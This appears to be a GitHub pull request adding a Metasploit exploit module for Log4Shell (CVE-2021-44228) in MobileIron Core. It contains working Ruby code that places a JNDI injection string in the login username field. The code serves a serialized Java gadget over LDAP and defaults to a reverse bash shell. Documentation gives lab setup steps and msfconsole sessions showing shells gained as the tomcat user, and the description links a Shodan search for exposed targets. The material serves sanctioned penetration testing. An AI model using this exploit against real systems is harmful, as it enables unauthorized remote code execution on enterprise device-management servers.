### PR TITLE
MobileIron Core Log4Shell RCE Module (CVE-2021-44228)

### DIFF
--- a/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md
+++ b/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md
@@ -1,0 +1,112 @@
+## Vulnerable Application
+
+### Description
+MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
+will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
+command execution in the context of the tomcat user.
+
+This module will start an LDAP server that the target will need to connect to.
+
+### Setup
+Once MobileIron Core is installed, no configuration needs to take place. The application is vulnerable out of the box.
+
+### MobileIron Core Appliance ISO Installation on VMWare Fusion
+
+1. Obtain a `mobileiron-##.#.#.#-##.iso` file, the following steps utilize `mobileiron-10.6.0.0-23.iso`.
+2. Use the ISO to create "A New Virtual Machine".
+3. Customize the VM settings to your liking. I gave the VM 4gb RAM, 4 cores, and changed the network adapter to a bridged mode
+so that I can hit it over the network.
+4. Boot the new virtual machine.
+5. Type `vm-install` at the `boot:` prompt.
+6. Wait patiently while the VM reboots and begins the install process. The system *will* reboot when installation completes.
+7. When prompted with `Continue with configuration dialog?`, type `yes`
+8. Type `q` to clear the license from the screen.
+9. Accept the End User License Agreement by typing `yes`
+10. Enter a Company Name / contact / email of your choosing. They don't matter.
+11. Configure an enable password (e.g. `Labpass1`)
+12. Enter an admin user name (e.g. `albinolobster`)
+13. Enter and confirm an admin password (e.g. `Labpass1`)
+14. Select `a` for the management interface
+15. Assign a static IP address and network mask that works with your test network. (e.g. `10.9.49.101` and `255.255.255.0`)
+16. Enter your test networks default gateway (e.g. `10.9.49.1`)
+17. Enter a fully-qualified domain name for the device (e.g. `lobster.example.com`). Unfortunately, this needs to work. I added a
+static DNS enty to my lab network's router.
+18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. `10.9.49.1`)
+19. Enter blank entries for name server 2 and 3.
+20. `yes` to enable remote shell access (why not, right?)
+21. `no` to configuring NTP
+22. `no` to configuring system clock
+23. `yes` to commit changes
+24. Type `reload` to restart the system and `yes`, when prompted, to both saving the configuration and proceeding with the reload
+25. When the system has restarted, you should now have a vulnerable install of MobileIron Core.
+26. Visit `https://ipaddr` to ensure the HTTP server has fully loaded
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/http/mobileiron_core_log4shell`
+3. Set the `RHOSTS`, `LHOST`, and `SRVHOST`
+4. Do: `run`
+5. If the target is vulnerable, the payload should be executed
+
+## Options
+
+## Scenarios
+
+### MobileIron Core 11.2.0.0-31
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.100
+RHOSTS => 10.9.49.100
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.100:48004) at 2022-07-29 09:46:14 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux hackercat.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### MobileIron Core 10.6.0.0-23
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.101
+RHOSTS => 10.9.49.101
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.101:35304) at 2022-07-29 10:19:58 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux lobster.example.com 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 10.9.49.101 - Command shell session 1 closed.
+```

--- a/modules/exploits/linux/http/mobileiron_core_log4shell.rb
+++ b/modules/exploits/linux/http/mobileiron_core_log4shell.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Log4Shell
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::CheckModule
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(_info = {})
+    super(
+      'Name' => 'MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)',
+      'Description' => %q{
+        MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
+        will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
+        command execution in the context of the tomcat user.
+
+        This module will start an LDAP server that the target will need to connect to.
+      },
+      'Author' => [
+        'Spencer McIntyre', # JNDI/LDAP lib stuff
+        'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
+        'rwincey', # discovered log4shell vector in MobileIron
+        'jbaines-r7' # wrote this module
+      ],
+      'References' => [
+        [ 'CVE', '2021-44228' ],
+        [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],
+        [ 'URL', 'https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US' ],
+        [ 'URL', 'https://www.mandiant.com/resources/mobileiron-log4shell-exploitation' ]
+      ],
+      'DisclosureDate' => '2021-12-12',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL' => true,
+        'SRVPORT' => 389,
+        'WfsDelay' => 30,
+        'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
+      },
+      'Targets' => [
+        [
+          'Linux', {
+            'Platform' => 'unix',
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          },
+        ]
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'AKA' => ['Log4Shell', 'LogJam'],
+        'Reliability' => [REPEATABLE_SESSION],
+        'RelatedModules' => [
+          'auxiliary/scanner/http/log4shell_scanner',
+          'exploit/multi/http/log4shell_header_injection'
+        ]
+      }
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'Base path', '/'])
+    ])
+  end
+
+  def wait_until(&block)
+    datastore['WfsDelay'].times do
+      break if block.call
+
+      sleep(1)
+    end
+  end
+
+  def check
+    validate_configuration!
+
+    vprint_status('Attempting to trigger the jndi callback...')
+
+    start_service
+    res = trigger
+    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
+
+    wait_until { @search_received }
+    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
+  ensure
+    cleanup_service
+  end
+
+  def build_ldap_search_response_payload
+    return [] if @search_received
+
+    @search_received = true
+
+    return [] unless @exploiting
+
+    print_good('Delivering the serialized Java object to execute the payload...')
+    build_ldap_search_response_payload_inline('CommonsBeanutils1')
+  end
+
+  def trigger
+    @search_received = false
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'mifs', 'j_spring_security_check'),
+      'headers' => {
+        'Referer' => "https://#{rhost}#{normalize_uri(target_uri, 'mifs', 'user', 'login.jsp')}"
+      },
+      'encode' => false,
+      'vars_post' => {
+        'j_username' => log4j_jndi_string,
+        'j_password' => Rex::Text.rand_text_alphanumeric(8),
+        'logincontext' => 'employee'
+      }
+    )
+  end
+
+  def exploit
+    @exploiting = true
+    start_service
+    res = trigger
+    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302
+
+    wait_until { @search_received && (!handler_enabled? || session_created?) }
+    handler
+  end
+end

--- a/modules/exploits/linux/http/mobileiron_core_log4shell.rb
+++ b/modules/exploits/linux/http/mobileiron_core_log4shell.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Log4Shell
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::CheckModule
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(_info = {})
@@ -38,8 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'RPORT' => 443,
         'SSL' => true,
         'SRVPORT' => 389,
-        'WfsDelay' => 30,
-        'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
+        'WfsDelay' => 30
       },
       'Targets' => [
         [
@@ -121,6 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    validate_configuration!
     @exploiting = true
     start_service
     res = trigger


### PR DESCRIPTION
This module exploits [MobileIron Core](https://www.shodan.io/search?query=title%3A%22MobileIron+User+Portal%22) using Log4Shell. The JNDI string is stored in the `j_username` parameter during a login attempt. Exploitation results in access as the `tomcat` user. [Mandiant](https://www.mandiant.com/resources/mobileiron-log4shell-exploitation) noted MobileIron Core has been exploited in the wild.

There is nothing too crazy about this module's implementation. I largely stole from @smcintyre-r7's Ubiquiti Controller and VMware Log4Shell modules. Technically speaking, we could add a bit of a version check in `check` because you can extract the `major`.`minor` version of the target from the login page (`/mifs/user/login.jsp`). But I opted not too because it seemed like unnecessary work. But, I figured I'd be honest about that detail.

![mobileiron_version_login jsp](https://user-images.githubusercontent.com/91965877/181816313-a6d3f185-39fb-4217-91ff-9db979273cb0.png)

[Ivanti states](https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US) that MobileIron Core before 11.5 is affected. But we only have access to 11.2 and 10.6, so that's what was tested :shrug: 

## Verification

Follow installation steps listed in the module's documentation.

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/mobileiron_core_log4shell`
- [x] `set LHOST`
- [x] `set RHOSTS`
- [x] `set SRVHOST`
- [x] `set SRVPORT` (optional, but I set it to 1389 so msfconsole doesn't have root privs)
- [x] `run`
- [x] A wild reverse shell appears

## PoC Video || GTFO

https://www.youtube.com/watch?v=H9tUXMmvZ34

## PCAP || GTFO

[mobileiron_core_log4shell.zip](https://github.com/rapid7/metasploit-framework/files/9222142/mobileiron_core_log4shell.zip)

